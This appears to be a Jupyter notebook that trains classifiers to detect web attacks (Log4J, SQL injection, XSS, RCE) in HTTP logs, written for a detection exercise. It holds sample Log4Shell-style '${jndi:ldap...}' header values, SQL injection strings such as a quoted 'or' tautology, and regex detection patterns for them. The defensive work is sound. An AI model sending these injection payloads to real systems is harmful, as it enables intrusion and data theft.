data:['ck=G9415mM3aBnoM9EbJkT4VA; Domain=http://boughtitsoldit.com/ceservice; Expires=Fri, 03 Feb 2023 01:23:35 GMT', 'uu=MMvito_tXeM1dT99UokCvpzcxM5yrUDPBxJUnYwv5N0; Domain=tvguide.com/celebrities/flora-martinez/236152; Expires=Sat, 04 Feb 2023 01:23:35 GMT', 'session=0b255799-2be0-4081-8e9e-52851ec845ac; Expires=Sun, 18 Dec 2022 02:15:35 GMT']${jndi:ldapodmp.org/officer/20822-patrolman-jonathan-schmidt}

index:	179314
col name:	request.headers.Accept-Encoding
data:gzip, deflate, br${jndi:ldaplookupanyone.com/namelistings/todd-rosewarne-mustapha-roshd.html}

index:	179362
col name:	request.headers.Accept-Encoding
data:gzip, deflate, br${jndi:ldaphttp://avxhome.se/software/software_type/office/Extensis.Portfolio.Enterprise.1.6.2.html}

index:	179405
col name:	request.headers.Accept-Encoding
data:gzip, deflate, br${jndi:ldaphttp://www.art-ecology-education.org/en/component/content/article/40-news/149-aee-events.html}

index:	179430
col 

(3756, 30)

In [5]:
# Try area
# Literal substrings that are swapped for a placeholder token
special_rep = {'{}': 'EMPTYDIR'}
# Tokens that get padded with one space on each side
special_str = ['[', ']', '--', ';', "'", '{', '}', '=', ',']
# Regex pattern -> replacement template; pads a '%' followed by two digits with spaces
patterns_rep = {r'\%\d\d': r' \g<0> '}

def replace_str_for_types(s):
    """Return ``s`` with special tokens replaced or padded with spaces.

    Applied in this order:
      1. every key of ``special_rep`` is replaced by its value;
      2. every entry of ``special_str`` is surrounded by single spaces;
      3. every regex in ``patterns_rep`` is substituted with its template.
    """
    for literal, placeholder in special_rep.items():
        s = s.replace(literal, placeholder)
    for token in special_str:
        s = s.replace(token, ' ' + token + ' ')
    for regex, template in patterns_rep.items():
        s = re.sub(regex, template, s)
    return s

def space_words_data(s):
    """Return ``s`` with every separator padded by a space on each side.

    A separator is, in order of preference at each position: a double
    hyphen, a '%' followed by two digits, or any single character that is
    not a letter, a digit, '-' or '_'.
    """
    separator = r"(\-\-)|(\%\d\d)|([^A-Za-z0-9-_])"
    return re.sub(separator, lambda hit: ' ' + hit.group(0) + ' ', s)

# r"(\-\-)|(\%\d\d)|'[A-Za-z0-9]+'|([^A-Za-z0-9-_])"

def is_sql_type(s: str):
    """Return True when ``s`` matches one of the SQL-injection regexes below.

    The patterns are searched anywhere in ``s``; the first hit is enough.
    Returns False when none of them matches.
    """
    sql_signatures = (
        r"';SELECT%20\*%20FROM%20.*(--)?",  # quote, then a URL-encoded "SELECT * FROM ..."
        r"'.*--",                           # quote followed somewhere later by "--"
        r"'%20or%20'(.*)'.*=.*'\1.*",       # ' or 'X'='X' style tautology (same text on both sides)
    )
    return any(re.search(signature, s) is not None for signature in sql_signatures)


# Sample URLs used to eyeball the output of space_words_data
#r_s = "orders/get/country?country=';SELECT%20*%20FROM%20order_details%20--hjgkgh"
r_s = "login/user?username=Shenita&password=JeriBarney'%20or%20'JoyceHopper'='JoyceHopper"
print(space_words_data(r_s))

# keep_list = ['Benign', 'Cookie Injection', 'Directory Traversal', 'Log Forging']
# keep_list = ['Benign', 'LOG4J']#, 'SQL Injection']
# df = df[df['attack_type'].isin(keep_list)]
#print(*f[['request.url']].values.tolist(), sep='\n')

# Toy DataFrame: checks what happens when a single scalar is assigned to a whole row
info= {"Num":[12,14,13,12,14,13,15], "NAME":['John','Camili','Rheana','Joseph','Amanti','Alexa','Siri']}

data = pd.DataFrame(info)
print(data)
# The scalar is written into every column of row 0
data.iloc[0]='new value'
data

login / user ? username = Shenita & password = JeriBarney '  %20 or %20  ' JoyceHopper '  =  ' JoyceHopper
   Num    NAME
0   12    John
1   14  Camili
2   13  Rheana
3   12  Joseph
4   14  Amanti
5   13   Alexa
6   15    Siri


Unnamed: 0,Num,NAME
0,new value,new value
1,14,Camili
2,13,Rheana
3,12,Joseph
4,14,Amanti
5,13,Alexa
6,15,Siri


In [None]:
# Setting features for further feature extraction by choosing columns
# Some will be "simply" encoded via label encoding and others with HashingVectorizer

LOG4_COL_NAME = 'isLog4J'

# These headers are "simply" encoded with LabelEncoder (one integer per distinct value)
SIMPLE_HEADERS = ['request.headers.Accept-Encoding',
                'request.headers.Connection',
                'request.headers.Host',
                'request.headers.Accept',
                'request.method',
                'request.headers.Accept-Language',
                'request.headers.Sec-Fetch-Site',
                'request.headers.Sec-Fetch-Mode',
                'request.headers.Sec-Fetch-Dest',
                'request.headers.Sec-Fetch-User',
                'response.status',
                'request.headers.Cache-Control', 'request.headers.Sec-Ch-Ua-Mobile',
                'request.headers.Sec-Ch-Ua-Platform', 'request.headers.Upgrade-Insecure-Requests',
                'response.headers.Content-Length'
                ]

# On these headers we will run HashingVectorizer
COMPLEX_HEADERS = ['request.headers.User-Agent',
                   'request.headers.Set-Cookie',
                   'request.headers.Date',
                   'request.url',
                   'response.headers.Content-Type',
                   'response.body',
                   'response.headers.Location',
                   'request.headers.Content-Length',
                   'request.headers.Cookie',
                   'response.headers.Set-Cookie']

COLUMNS_TO_REMOVE = ['request.body',
                    'request.headers.Date']


# This is our main preprocessing function that will iterate over all of the chosen 
# columns and run some feature extraction models
def vectorize_df(df):
    """Tag attack rows by pattern, then encode the feature columns of ``df``.

    The work is done in place on ``df`` in four steps:

    1. Every string cell is scanned row by row, in column order. When the
       'request.url' cell satisfies ``is_sql_type`` the whole row is
       overwritten with the sentinel '444444' and labelled
       'SQL Injection' / 'Malware'. When any string cell ends with a
       "${name:...}" expression the whole row is overwritten with the
       sentinel '51' and labelled 'LOG4J' / 'Malware'. Scanning of a row
       stops at its first hit.
    2. Each column in ``SIMPLE_HEADERS`` is label-encoded.
    3. Each column in ``COMPLEX_HEADERS`` is passed through
       ``space_words_data`` and then hashed with ``HashingVectorizer``.
    4. Each column in ``COLUMNS_TO_REMOVE`` is dropped.

    Args:
        df: DataFrame holding the columns named in the three lists above
            plus 'attack_type' and 'label'.

    Returns:
        The same ``df`` object, after the in-place changes.
    """
    # NOTE(review): step 1 overwrites both the features and the ground-truth
    # 'attack_type' / 'label' of a matching row. If this function is also run
    # on evaluation data, the reported scores include these regex decisions --
    # confirm that this is intended.

    # Matches a "${name:...}" expression at the end of a value; compiled once
    # instead of once per cell.
    log4j_pattern = re.compile(r'\$\{[a-z]+:.*\}$')

    column_names = df.columns.to_list()
    # Only the index labels are needed; the row objects were never used.
    for index in df.index:
        for col in column_names:
            data = df.loc[index, col]
            if not isinstance(data, str):
                continue
            if col == 'request.url' and is_sql_type(data):
                df.loc[index] = '444444'
                df.loc[index, 'attack_type'] = 'SQL Injection'
                df.loc[index, 'label'] = 'Malware'
                break
            if log4j_pattern.search(data):
                df.loc[index] = '51'
                df.loc[index, 'attack_type'] = 'LOG4J'
                df.loc[index, 'label'] = 'Malware'
                break

    le = LabelEncoder()
    # Tokens are runs of characters that are neither whitespace nor '/'
    h_vec = HashingVectorizer(n_features=2**5, ngram_range=(1, 10), alternate_sign=False, token_pattern=r'[^\s/]+')

    # Run LabelEncoder on the chosen features
    for column in SIMPLE_HEADERS:
        df[column] = le.fit_transform(df[column])

    # Run HashingVectorizer on the chosen features
    for column in COMPLEX_HEADERS:
        # Store the spaced-out text back into the column. The result of
        # apply() used to be discarded, so the vectorizer never saw it.
        df[column] = df[column].apply(space_words_data)
        newHVec = h_vec.fit_transform(df[column])
        # NOTE(review): the hashed matrix has 2**5 columns but is assigned to a
        # single DataFrame column -- confirm that the installed pandas version
        # stores what you expect here.
        df[column] = newHVec.todense()

    # Remove some columns that may be needed.. (Or not, you decide)
    # NOTE(review): 'request.headers.Date' is listed in both COMPLEX_HEADERS and
    # COLUMNS_TO_REMOVE, so it is hashed above and then dropped here.
    for column in COLUMNS_TO_REMOVE:
        df.drop(column, axis=1, inplace=True)
    return df

df = vectorize_df(df)
df

In [None]:
# Memory check (For large datasets sometimes the dataframe will exceed the computers resources)
df.info(memory_usage="deep")

In [None]:
# Choose the right features
# In our example code we choose all the columns as our features; this can be the right or wrong way to approach the model, you choose.

# Start from every column and take out the two target columns
features_list = df.columns.to_list()
features_list.remove('label')
features_list.remove('attack_type')

# features_list_more keeps every feature (including 'response.headers.Content-Length');
# features_list is the same list without that column
features_list_more = features_list.copy()
features_list.remove('response.headers.Content-Length')


# features_list.remove('response.headers.Content-Length')

print(features_list)

# Recheck all datatypes before training to see we don't have any objects in our features
# In this example our model must get features containing only numbers so we recheck to see if we missed anything during preprocessing
df.dtypes

In [None]:
# Increase the size of the heatmap.
plt.figure(figsize=(16, 6))
# Store heatmap object in a variable to easily access it when you want to include more features (such as title).
# Set the range of values to be displayed on the colormap from -1 to 1, and set the annotation to True to display the correlation values on the heatmap.
# df still holds the string-valued 'label' and 'attack_type' columns, and
# DataFrame.corr() raises on non-numeric columns in pandas >= 2.0, so only the
# numeric/bool columns are correlated (older pandas dropped the rest silently).
heatmap = sns.heatmap(df.select_dtypes(include=['number', 'bool']).corr(), vmin=-1, vmax=1, annot=True)
# Give a title to the heatmap. Pad defines the distance of the title from the top of the heatmap.
heatmap.set_title('Correlation Heatmap', fontdict={'fontsize':12});

## Train test split

In [None]:
# Data train and test split preparations. Here we will insert our feature list and label list.
# Afterwards the data will be used to fit the classifier chosen in the model cells below
# X_train and y_train will be used for training
# X_test and y_test will be used for overfitting checks and overall score testing

# We convert the feature list to a numpy array, this is required for the model fitting
# (features_list_more is the feature list that still contains 'response.headers.Content-Length')
X = df[features_list_more].to_numpy()

# This column is the desired prediction we will train our model on
y = np.stack(df[test_type])

# Row positions 0..NUM_ROWS-1 are split alongside X and y, so every train/test
# sample can be traced back to its row
NUM_ROWS = X.shape[0]
indices = np.arange(NUM_ROWS)
print(indices)
# We split the dataset to train and test according to the required ratio
# Do not change the test_size -> you can change anything else
# stratify=y keeps the class proportions of y in both parts
X_train, X_test, y_train, y_test, indices_train, indices_test = train_test_split(X, y, indices, test_size=0.1765, random_state=42, stratify=y)

# We print the shapes of the resulting datasets and count the samples per class
print(X_train.shape, y_train.shape)
print(X_test.shape, y_test.shape)
counter = Counter(y)
counter

## Model choosing and fitting

In [None]:
sub_features_list = ['request.url','response.headers.Content-Type',
                'response.body',
                'response.status_code',
                'response.status',
                'response.headers.method']

sud_feats_last = ['response.headers.Content-Length', 'request.url']
sub_label_list = ['Benign', 'SQL Injection', 'XSS', 'RCE']

def get_sub_train(X, y, clf, feat_og, feat_sub, label_sub, isNeg=False):
    """Fit ``clf`` on a row/column subset of the training data.

    Rows are kept when their label is listed in ``label_sub`` (or, when
    ``isNeg`` is true, when it is NOT listed). Columns are kept when the
    corresponding name in ``feat_og`` also appears in ``feat_sub``.

    Args:
        X: 2-D numpy array of samples; its columns are described by ``feat_og``.
        y: 1-D numpy array of labels, one per row of ``X``.
        clf: estimator exposing ``fit(X, y)``.
        feat_og: names of the columns of ``X``, in column order.
        feat_sub: names of the columns to keep.
        label_sub: labels whose rows are selected; ``None`` is treated as an
            empty list.
        isNeg: when true, invert the row selection.

    Returns:
        A tuple ``(X_new, y_new, fitted)`` where ``fitted`` is whatever
        ``clf.fit(X_new, y_new)`` returns.
    """
    # The original assigned the fallback to an unused local (``label``), so the
    # None guard never took effect; normalise the real argument instead.
    if label_sub is None:
        label_sub = []

    col_mask = np.isin(feat_og, feat_sub)
    row_mask = np.isin(y, label_sub)
    if isNeg:
        row_mask = ~row_mask

    # Filter rows first, then columns.
    X_new = X[row_mask][:, col_mask]
    y_new = y[row_mask]

    return (X_new, y_new, clf.fit(X_new, y_new))


# X_train_2, y_train_2 = get_sub_train(X_train, y_train, features_list, features_list, sub_label_list, isNeg=True)

In [None]:
# from sklearn.naive_bayes import GaussianNB, MultinomialNB, BernoulliNB
# # from sklearn.preprocessing import StandardScaler


# X_train_1, y_train_1 = get_sub_train(X_train, y_train, features_list, sub_features_list, sub_label_list)
# # X_train_2, y_train_2 = get_sub_train(X_train, y_train, features_list, features_list, ['RCE'], isNeg=True)

# # We choose our model of choice and set it's hyper parameters you can change anything
# clf = DecisionTreeClassifier()
# clf2 = DecisionTreeClassifier()

# # Train Model
# clf.fit(X_train, y_train)
# clf2.fit(X_train_1, y_train_1)

# # Check data balance and variety
# print("train:")
# print(*sorted(Counter(y_train).items()), sep='\n')

# print()

# print("test labels:")
# print(*sorted(Counter(y_test).items()), sep='\n')

In [None]:
######################## tryyyyy ######################

from sklearn.naive_bayes import GaussianNB, MultinomialNB, BernoulliNB
from sklearn.linear_model import SGDClassifier
# from sklearn.preprocessing import StandardScaler

# Base model: a decision tree fitted on every feature and every label.
# You can change the model and its hyper parameters.
clf = DecisionTreeClassifier()
clf.fit(X_train, y_train)

# Refinement models: each one is fitted by get_sub_train() on the rows whose
# label is in the given label list, restricted to the given feature subset.
X_train_1, y_train_1, clf1 = get_sub_train(
    X_train, y_train,
    DecisionTreeClassifier(),
    features_list_more, sub_features_list, sub_label_list,
)
X_train_2, y_train_2, clf2 = get_sub_train(
    X_train, y_train,
    DecisionTreeClassifier(),
    features_list_more, features_list, ['Benign', 'XSS'],
)
X_train_3, y_train_3, clf3 = get_sub_train(
    X_train, y_train,
    DecisionTreeClassifier(),
    features_list_more, features_list, ['Benign', 'RCE'],
)
X_train_4, y_train_4, clf4 = get_sub_train(
    X_train, y_train,
    RandomForestClassifier(n_estimators=100),
    features_list_more, sub_feats_last, ['RCE', 'XSS'],
)

# (classifier, feature subset, labels it re-classifies), in the order the
# predict() helper applies them.
clf_feat_label_list = [
    (clf1, sub_features_list, sub_label_list),
    (clf2, features_list, ['Benign', 'XSS']),
    (clf3, features_list, ['Benign', 'RCE']),
    (clf4, sub_feats_last, ['XSS', 'RCE']),
]

# Check data balance and variety: one (label, count) pair per line.
train_counts = sorted(Counter(y_train).items())
print("train:")
print('\n'.join(str(pair) for pair in train_counts))

print()

test_counts = sorted(Counter(y_test).items())
print("test labels:")
print('\n'.join(str(pair) for pair in test_counts))

######################## tryyyyy ######################

## Result printout

In [None]:
def predict(data, clf, clf_feat_label_list, feature_names=None):
    """Predict with a base classifier, then refine through a cascade.

    ``clf`` labels every row of ``data``. Each ``(stage_clf, feats, labels)``
    entry of ``clf_feat_label_list`` is then applied in order: rows whose
    current prediction is in ``labels`` are re-predicted by ``stage_clf`` using
    only the columns named in ``feats``. Later stages see the predictions
    already rewritten by earlier stages.

    Args:
        data: 2-D numpy array of samples; columns follow ``feature_names``.
        clf: fitted base estimator exposing ``predict``.
        clf_feat_label_list: iterable of ``(estimator, feature_names_subset,
            labels)`` tuples describing the refinement stages.
        feature_names: names of the columns of ``data``. Defaults to the
            notebook-level ``features_list_more``.

    Returns:
        The array returned by ``clf.predict(data)``, updated in place with the
        refined labels.
    """
    if feature_names is None:
        feature_names = features_list_more

    predictions = clf.predict(data)

    for stage_clf, feats, labels in clf_feat_label_list:
        col_mask = np.isin(feature_names, feats)
        # Rows this stage is responsible for, based on the current predictions.
        row_mask = np.isin(predictions, labels)
        if not row_mask.any():
            # Nothing to refine; also avoids calling predict() on zero samples.
            continue
        # One batched call per stage instead of one predict() call per row.
        predictions[row_mask] = stage_clf.predict(data[row_mask][:, col_mask])

    return predictions


In [None]:
# We print our results
predictions = predict(X_test, clf, clf_feat_label_list) # clf.predict(X_test) #

def value_accu(predictions, y_test):
    """Plot a confusion-matrix heatmap and print the classification report.

    Args:
        predictions: 1-D sequence of predicted labels.
        y_test: 1-D sequence of true labels, aligned with ``predictions``.

    The heatmap rows are the true labels and the columns are the predicted
    labels, matching scikit-learn's ``confusion_matrix(y_true, y_pred)``.
    """
    sns.set(rc={'figure.figsize':(15,8)})

    true_labels = y_test

    # Use the union of true and predicted classes for both the matrix and the
    # tick labels, so the ticks always line up with the matrix rows/columns
    # even when a class appears on only one side.
    class_names = np.unique(np.concatenate((np.asarray(true_labels),
                                            np.asarray(predictions))))

    # confusion_matrix expects (y_true, y_pred); the original call passed them
    # swapped, which silently transposed the plot.
    cf_matrix = confusion_matrix(true_labels, predictions, labels=class_names)
    clf_report = classification_report(true_labels, predictions, digits=5)
    heatmap = sns.heatmap(cf_matrix, annot=True, cmap='Blues', fmt='g',
                          xticklabels=class_names,
                          yticklabels=class_names)
    heatmap.set_xlabel('Predicted label')
    heatmap.set_ylabel('True label')

    # The heatmap is cool but this is the most important result
    print(clf_report)

value_accu(predictions, y_test)

In [None]:
# Reset the scratch state for the (currently commented-out) error-analysis
# cells: a running position counter and two lookup tables keyed by
# "predicted->true" strings.
counter = 0
dict_me, dict_data = {}, {}

In [None]:
# # print(*h, sep='\n')
# h = zip(predictions, true_labels)
# for p,t in h:
#     s = f'{p}->{t}'
#     if s not in dict_me:
#         dict_me[s] = 0
#     dict_me[s] += 1

# print(dict_me, sep='\n')
# print()
# counter = 0

# h = zip(predictions, true_labels)
# for p,t in h:
    
#     s = f'{p}->{t}'
#     if s not in dict_data:
#         dict_data[s] = set()
#     dict_data[s].add(indices_test[counter])
#     counter += 1
    
    
# # print(dict_data, sep='\n')
# print('\n')

# #print('Benign->SQL Injection:', dict_data['Benign->SQL Injection'], sep='\n')

# # print('RCE->Benig', dict_data['SQL Injection->Benign'], sep='\n')
# print()

In [None]:
# print('fake Benign:')
# ind_list = list(dict_data['Malware->Benign'])
# # print(df_checker.iloc[ind_list])
# # print()

# # print('fake Benign:')
# # ind_list = list(dict_data['SQL Injection->Benign'])
# df_checker.iloc[ind_list]['request.url'].values.tolist()

# Test

In [None]:
# Now it's your turn, use the model you have just created :)
raw_ds = {}

# Load the validation split that belongs to the selected dataset.
with open(f'./dataset_{str(dataset_number)}_val.json') as val_file:
    raw_ds = json.load(val_file)

# Flatten the nested JSON with the same settings as the training data.
test_df = pd.json_normalize(raw_ds, max_level=2)

# Apply the training preprocessing; remember that there are no labels here.
# NOTE(review): fill_na_df's return value is ignored, so it presumably fills
# the dataframe in place -- confirm against its definition.
fill_na_df(test_df)
test_df = vectorize_df(test_df)

# Predict with the base model followed by the refinement cascade.
X = test_df[features_list_more].to_numpy()
predictions = predict(X, clf, clf_feat_label_list) # clf.predict(X)

predictions

# Save your predictions

In [None]:
# Save your predictions: labels are converted to integer codes and written one
# per line.
# NOTE(review): the encoder is fitted on the predictions themselves, so the
# integer assigned to a label depends on which labels were actually predicted
# -- confirm this matches the expected submission encoding.
enc = LabelEncoder()
encoded_predictions = enc.fit_transform(predictions)
result_path = f'./dataset_{str(dataset_number)}_{test_type}_result.txt'
np.savetxt(result_path, encoded_predictions, fmt='%2d')

In [None]:
import re

# Scratch cell for trying out SQL-injection regexes.

# Tautology probe such as  '%20or%20'JoyceHopper'='JoyceHopper :
# the back-reference requires the same text on both sides of the '='.
pattern = r"'%20or%20'(.*)'='\1"

# Sample input to search in.
string = "'%20or%20'JoyceHopper'='JoyceHopper"

match = re.search(pattern, string)

if match is None:
    print('No duplicate words found')
else:
    print('Found a duplicate word:', match.group(1))

# Stacked-query probe such as  ';SELECT%20*%20FROM%20us_states%20--
# Note that it is searched in the tautology sample above, not in a
# stacked-query sample.
pattern2 = r"';SELECT%20\*%20FROM%20.*(--)?"
verdict = "GOOD" if re.search(pattern2, string) else "bad...."
print(verdict)

In [None]:
# sub_features_list = ['request.url',
#                 'response.body',
#                 'response.status_code',
#                 'response.status']
# sub_label_list = ['Benign', 'SQL Injection', 'RCE']

# def get_sub_train(X, y, feat_og, feat_sub, label_sub, isNeg=False):
#     if label_sub is None:
#         label = []
#     bool_feats = np.isin(feat_og, feat_sub)
#     bool_labels = np.isin(y, label_sub)
#     if isNeg:
#         bool_labels = ~bool_labels
#     return (X[bool_labels][:, bool_feats] , y[bool_labels])
    

# get_sub_train(X_train, Y_train)

# # y_train[bool_list_labels]
# print(X_train.shape)
# print(bool_feat_list.shape)
# print(bool_list_labels.shape, '\n')

# print(X_train, '\n')
# print(bool_feat_list, '\n')
# print(bool_list_labels, '\n')

# X_train[bool_list_labels][:, bool_feat_list]
#X_train_sub, y_train_sub = get_sub_train(X, y, features_list, sub_features_list, sub_label_list)

In [None]:
# features_list

In [None]:
import numpy as np

# Scratch check of positional indexing on a small integer array.
# Note that this rebinds the notebook-level name `y`.
y = np.array((0, 3, 4, 7, 99))
y[1]